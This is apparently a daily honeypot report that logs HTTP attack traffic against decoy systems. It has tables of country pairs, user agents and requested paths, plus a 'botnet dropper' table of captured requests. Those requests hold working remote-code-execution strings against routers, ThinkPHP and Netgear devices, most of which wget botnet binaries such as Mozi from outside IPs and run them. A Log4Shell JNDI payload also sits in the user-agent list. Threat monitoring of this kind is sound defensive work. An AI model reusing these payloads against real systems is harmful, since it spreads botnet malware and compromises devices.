Table of Contents

Daily Report: 2025-03-20
#

interaction report on http service of various Hhoneypot around the world.

OT report simplified
Botnet dropper behaviour
List of user_agent
List of request
List of country_iso_code

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
US	Singapore
US	Australia
AU
US	Dubai
US	Dubai
CN	Georgia
PL
US
AE
US

botnet_dropper_behaviour
#

remote_addr	request
187.142.48.94	GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.129.101/jaws;chmod+777+/tmp/jaws;sh+/tmp/jaws HTTP/1.1
187.189.193.240	GET /shell?cd+/tmp;rm+-rf+*;wget+ http://157.245.200.182/Binarys/Nyx4r.arm;chmod+777+/tmp/Nyx4r.arm;sh+/tmp/Nyx4r.arm arm4.jaws HTTP/1.1
45.230.66.48	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.48:10756/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
58.146.59.84	GET /shell?cd+/tmp;rm+-rf+*;wget+ http://200.129.143.6/Binarys/Owari.arm;chmod+777+/tmp/Owari.arm;sh+/tmp/Owari.arm arm4.jaws HTTP/1.1
45.178.250.23	27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
189.167.71.63	GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.129.101/jaws;chmod+777+/tmp/jaws;sh+/tmp/jaws HTTP/1.1
180.106.105.231	GET /shell?cd+/tmp;rm+-rf+*;wget+http://180.106.105.231:44989/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
167.114.86.185	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
211.143.108.124	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
118.40.165.223	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://185.225.75.8/bins/vcimanagement.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
123.157.136.106	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1

user_agent
#

The list of User Agent presented here are those that have not yet been yet integrated into the user agent database database.

	number_of_occurence	user_agent
0	113	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
1	33	Mozilla/5.0 (iPhone; CPU iPhone OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Mobile/15E148 Safari/604.1
2	28	Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1
3	28	Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Mobile/15E148 Safari/604.1 Ddg/18.3
4	7	Mozilla/5.0 (Linux; U; Android 2.3.3; ko-kr; SHW-M250S Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
5	6	Opera/8.88.(X11; Linux i686; ur-PK) Presto/2.9.160 Version/12.00
6	6	Googlebot-Video/1.0
7	3	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15
8	3	Xpanse, a Palo Alto Networks company, indexes customer network perimeters. If you have any questions or concerns, please reach out to: scaninfo@paloaltonetworks.com.
9	2	Mozilla/5.0 (Linux; Android 9; moto x4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36
10	2	Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3068.0 Safari/537.36
11	2	Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
12	2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.18
13	2	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
14	2	Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.9.0) Gecko/2008061600 SUSE/3.0-1.2 Firefox/3.0
15	2	Mozilla/5.0 (Linux; Android 7.1.1; Z899VL Build/NMF26V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36
16	2	${jndi:ldap://${:-131}${:-904}.${hostName}.useragent.cvdlqtvdueihu608mbb0p1q1yfh417nw6.oast.site}
17	2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.3.17
18	2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
19	2	Mozilla/5.0 (Macintosh; Intel Mac OS X 12.5) AppleWebKit/617.19 (KHTML, like Gecko) Version/17.6.47 Safari/617.19
20	2	Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
21	2	Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
22	2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.24
23	2	Mozilla/5.0 (Kubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
24	1	Mozilla/5.0 (Linux; U; Android 4.2.2; fr-ca; GT-P5113 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
25	1	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
26	1	Opera/8.01 (Windows NT 5.1; U; fr)
27	1	Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100130 Gentoo Firefox/3.6
28	1	Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5
29	1	Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; HUAWEI Y600-U20 Build/HUAWEIY600-U20) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
30	1	Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8
31	1	Mozilla/4.0 (compatible; MSIE 5.50; Windows 95; SiteKiosk 4.8)
32	1	Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
33	1	Mozilla/5.0 (Ubuntu; X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
34	1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
35	1	Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)
36	1	Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.46 Safari/525.19
37	1	Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1
38	1	Mozilla/5.0 (iPad; CPU OS 8_1 like Mac OS X) AppleWebKit/600.1.4.11.10 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
39	1	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/37.0.2062.103 Safari/537.36
40	1	Callpod Keeper for Android 1.0 (10.1.1/240) Dalvik/2.1.0 (Linux; U; Android 6.0; LG-V495 Build/MRA58K)
41	1	Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
42	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
43	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
44	1	Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
45	1	Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A406 Safari/8536.25
46	1	Opera/9.80 (Windows NT 6.2) Presto/2.12.388 Version/12.14
47	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.8.25
48	1	Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36
49	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
50	1	Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2
51	1	Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/31.0
52	1	Mozilla/5.0 (Windows NT 6.3; Win64, x64; Trident/7.0; rv:11.0) like Gecko
53	1	Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.2.15 Version/10.00
54	1	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36
55	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
56	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/11.0.1 Safari/601.2.7
57	1	Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
58	1	Mozilla/5.0 (Windows NT 6.1; rv:7.0) Gecko/20100101 Firefox/7.0
59	1	Mozilla/5.0 (Windows NT 10.0; rv:55.0) Gecko/20100101 Firefox/55.0
60	1	Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; LGMS769 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
61	1	MT6735_TD/V1 Linux/3.10.65+ Android/5.1 Release/03.03.2015 Browser/AppleWebKit537.36 Chrome/39.0.0.0 Mobile Safari/537.36 System/Android 5.1;
62	1	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.18.US Safari/537.36
63	1	Mozilla/5.0 (Linux; U; Android 2.3.6; en-gb; GT-I8160 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
64	1	libwww-perl/6.67
65	1	Mozilla/5.0 (Linux; Android 9; SM-G970U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
66	1	Mozilla/5.0 (X11; U; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.94 Safari/535.1
67	1	Mozilla/5.0 (X11; Linux i686; rv:40.0) Gecko/20100101 Firefox/40.0
68	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36
69	1	Python/3.7 aiohttp/3.8.1
70	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30
71	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:82.0) Gecko/20100101 Firefox/82.0
72	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
73	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
74	1	Mozilla/5.0 (X11; NetBSD amd64; rv:30.0) Gecko/20100101 Firefox/30.0
75	1	Mozilla/5.0 (X11; U; Linux x86_64; de-AT; rv:1.8.0.2) Gecko/20060422 Firefox/1.5.0.2
76	1	Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.1; en-US)
77	1	SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0
78	1	Mozilla/5.0 (Linux; Android 9; CLT-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
79	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
80	1	Mozilla/5.0 (Macintosh; PPC Mac OS X) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.8 Safari/534.34
81	1	Mozilla/5.0 (Linux; Android 4.1.2; GT-N8013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Safari/537.36
82	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
83	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36
84	1	Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
85	1	Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
86	1	libwww-perl/6.76
87	1	Mozilla/5.0 (Linux; Android 5.0.2; Redmi Note 3 Build/LRX22G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044030 Mobile Safari/537.36 MicroMessenger/6.6.6.1300(0x26060636) NetType/4G Language/zh_CN
88	1	Mozilla/5.0 (Linux; Android 5.0.2; vivo X6A Build/LRX22G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/48.0.2564.116 Mobile Safari/537.36 T7/10.8 baiduboxapp/10.8.0.10 (Baidu; P1 5.0.2)
89	1	Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
90	1	Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17
91	1	Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 YaBrowser/18.3.1.1232 Yowser/2.5 Safari/537.36
92	1	Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8
93	1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; MASMJS)
94	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.49 Safari/537.36
95	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
96	1	Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; HUAWEI Y360-U61 Build/HUAWEIY360-U61) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30;
97	1	Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.10) Gecko/20071015 SUSE/2.0.0.10-0.2 Firefox/2.0.0.10
98	1	Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
99	1	More Firefox 3.5 user agents strings –»
100	1	Mozilla/5.0 (Android 5.1.1; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0
101	1	Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
102	1	Mozilla/5.0 (Linux; Android 5.1.1; SM-G920V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36
103	1	Opera/9.00 (X11; Linux i686; U; pl)
104	1	Mozilla/5.0 (iPad; CPU OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1
105	1	Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)
106	1	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36 OPR/48.0.2685.32
107	1	Opera/9.80 (Android; Opera Mini/24.0.2254/62.178; U; en) Presto/2.12.423 Version/12.16
108	1	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
109	1	Mozilla/5.0 (Linux; Android 7.0; LGUS997 Build/NRD90U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36
110	1	Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
111	1	Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
112	1	Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1
113	1	Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
114	1	Mozilla/5.0 (X11; Linux i686; rv:2.0) Gecko/20100101 Firefox/4.0
115	1	Mozilla/5.0 (Linux; Android 6.0.1; SM-S327VL Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36
116	1	Mozilla/5.0 (X11; U; Linux ppc; fr; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12
117	1	Opera/9.80 (Linux mips; ) Presto/2.12.407 Version/12.51 MB97/0.0.39.10 (JVC, Mxl661L32, wireless) VSTVB_MB97 SmartTvA/3.0.0
118	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
119	1	Mozilla/5.0 (Linux; U; Android 4.0.4; ar-ae; GT-P7500 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
120	1	Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1
121	1	Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.454.0 Safari/534.2
122	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
123	1	Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; MediaPad 7 Lite Build/HuaweiMediaPad) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
124	1	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0)
125	1	Mozilla/5.0 (Linux; Android 7.0; LGMP260 Build/NRD90U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36
126	1	Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; NP08; MAAU; NP08; rv:11.0) like Gecko
127	1	Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
128	1	Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
129	1	Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
130	1	Mozilla/5.0 (Android 4.4.2; Tablet; rv:49.0) Gecko/49.0 Firefox/49.0
131	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.25
132	1	Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.2357.125 Safari/537.36 OPR/30.0.1835.88
133	1	Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Ubuntu/10.10 Chromium/9.0.600.0 Chrome/9.0.600.0 Safari/534.14
134	1	Opera/9.50 (Windows NT 5.2; U; it)
135	1	Mozilla/5.0 (Linux; U; Android 4.2.2; en-gb; SM-T111 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
136	1	Mozilla/5.0 (Android 4.4.2; Mobile; rv:50.0) Gecko/50.0 Firefox/50.0
137	1	Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
138	1	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MDDRJS)
139	1	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
140	1	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.8 Safari/537.36 OPR/40.0.2301.0 (Edition developer)
141	1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)
142	1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322)
143	1	Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-N900A Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
144	1	More Internet Explorer 4.01 user agents strings –»
145	1	Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5
146	1	Mozilla/5.0 (Linux; Android 4.4.2; SM-T230NU Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Safari/537.36
147	1	Opera/9.01 (Macintosh; PPC Mac OS X; U; en)
148	1	Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; MID8042 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
0	10	\x04\x01\x01\xBB\x00\x00\x00\x01proxychecker\x00api.ip.pn\x00
1	10	CONNECT api.ip.pn:443 HTTP/1.1
2	8	POST /FormLogin HTTP/1.1
3	8	GET /login.rsp HTTP/1.1
4	6	GET /restore.php HTTP/1.1
5	6	MGLNDD_xxx.xxx.xxx.xxx_80
6	5	GET /mips.nn HTTP/1.1
7	5	GET /bins/sora.ppc HTTP/1.1
8	5	GET /debug.dbg HTTP/1.1
9	5	GET /vv/mips64 HTTP/1.1
10	5	GET /bins/sora.arm6 HTTP/1.1
11	5	GET /vv/powerpc HTTP/1.1
12	5	GET /splsh4 HTTP/1.1
13	5	GET /aarch64 HTTP/1.1
14	5	GET /splarm6 HTTP/1.1
15	5	GET /x86_32.nn HTTP/1.1
16	5	GET /m68k.nn HTTP/1.1
17	5	GET /sparc.nn HTTP/1.1
18	5	GET /main_arm6 HTTP/1.1
19	5	GET /arm6.nn HTTP/1.1
20	5	GET /arm7.nn HTTP/1.1
21	5	GET /main_x86_64 HTTP/1.1
22	5	GET /jklspc HTTP/1.1
23	5	GET /tt/sparc HTTP/1.1
24	5	GET /tt/i686 HTTP/1.1
25	5	GET /vv/riscv32 HTTP/1.1
26	4	GET /tmpsl HTTP/1.1
27	4	GET /Yboats.arm7 HTTP/1.1
28	4	POST /wls-wsat/CoordinatorPortType HTTP/1.1
29	4	GET /bins/sora.mpsl HTTP/1.1
30	4	GET /Yboats.arm5 HTTP/1.1
31	4	GET /Yboats.arm HTTP/1.1
32	4	GET /Module1/js/Module_2o6q5no3oqp65504359524o2150s4333.js HTTP/1.1
33	4	GET /vv/armv4eb HTTP/1.1
34	4	POST /login.html HTTP/1.0
35	4	GET /main_arm7 HTTP/1.1
36	4	GET /vv/mips HTTP/1.1
37	4	GET /vv/sh4 HTTP/1.1
38	4	GET /tt/sh4 HTTP/1.1
39	4	GET /jklx86 HTTP/1.1
40	4	GET /splarm HTTP/1.1
41	4	GET /splmpsl HTTP/1.1
42	4	GET /nshkarm5 HTTP/1.1
43	3	GET /nshkppc HTTP/1.1
44	3	GET /nsharm6 HTTP/1.1
45	3	GET /nsharm7 HTTP/1.1
46	3	GET /nshkx86 HTTP/1.1
47	3	GET /x0ox0ox0oxDefault/z0r0.mpsl HTTP/1.1
48	3	GET /splppc HTTP/1.1
49	3	GET /nabarm7 HTTP/1.1
50	3	GET /splm68k HTTP/1.1
51	3	GET /nabarm6 HTTP/1.1
52	3	GET /mips HTTP/1.1
53	3	GET /t/arm7 HTTP/1.1
54	3	GET /jklppc HTTP/1.1
55	3	GET /sh4.nn HTTP/1.1
56	3	GET /arm5.nn HTTP/1.1
57	3	GET /x86_64.nn HTTP/1.1
58	3	GET /yakuza.ppc HTTP/1.1
59	3	GET /arm.nn HTTP/1.1
60	3	GET /ci/cd/.git/config HTTP/1.1
61	3	GET /LjEZs/uYtea.mpsl HTTP/1.1
62	3	GET /LjEZs/uYtea.arm6 HTTP/1.1
63	3	GET /LjEZs/uYtea.x86_64 HTTP/1.1
64	3	GET /LjEZs/uYtea.x86 HTTP/1.1
65	3	GET /yakuza.i586 HTTP/1.1
66	3	GET /LjEZs/uYtea.spc HTTP/1.1
67	3	GET /hidakibest.arm4 HTTP/1.1
68	3	GET /yakuza.arm6 HTTP/1.1
69	3	GET /dss HTTP/1.1
70	3	GET /hidakibest.mips HTTP/1.1
71	3	GET /bins/sora.spc HTTP/1.1
72	3	GET /bins/sora.mips HTTP/1.1
73	3	GET /bins/sora.arm5 HTTP/1.1
74	3	GET /bins/sora.m68k HTTP/1.1
75	3	GET /vv/i686 HTTP/1.1
76	3	GET /tarm7 HTTP/1.1
77	3	GET /tsh4 HTTP/1.1
78	3	GET /tt/powerpc HTTP/1.1
79	3	GET /tt/armv5l HTTP/1.1
80	3	GET /hiddenbin/boatnet.spc HTTP/1.1
81	3	GET /tarm HTTP/1.1
82	3	GET /tarm5 HTTP/1.1
83	3	GET /ee/armv6l HTTP/1.1
84	3	GET /tt/mipsel64 HTTP/1.1
85	3	GET /tt/armv4l HTTP/1.1
86	3	GET /tt/mips HTTP/1.1
87	3	GET /ee/armv5l HTTP/1.1
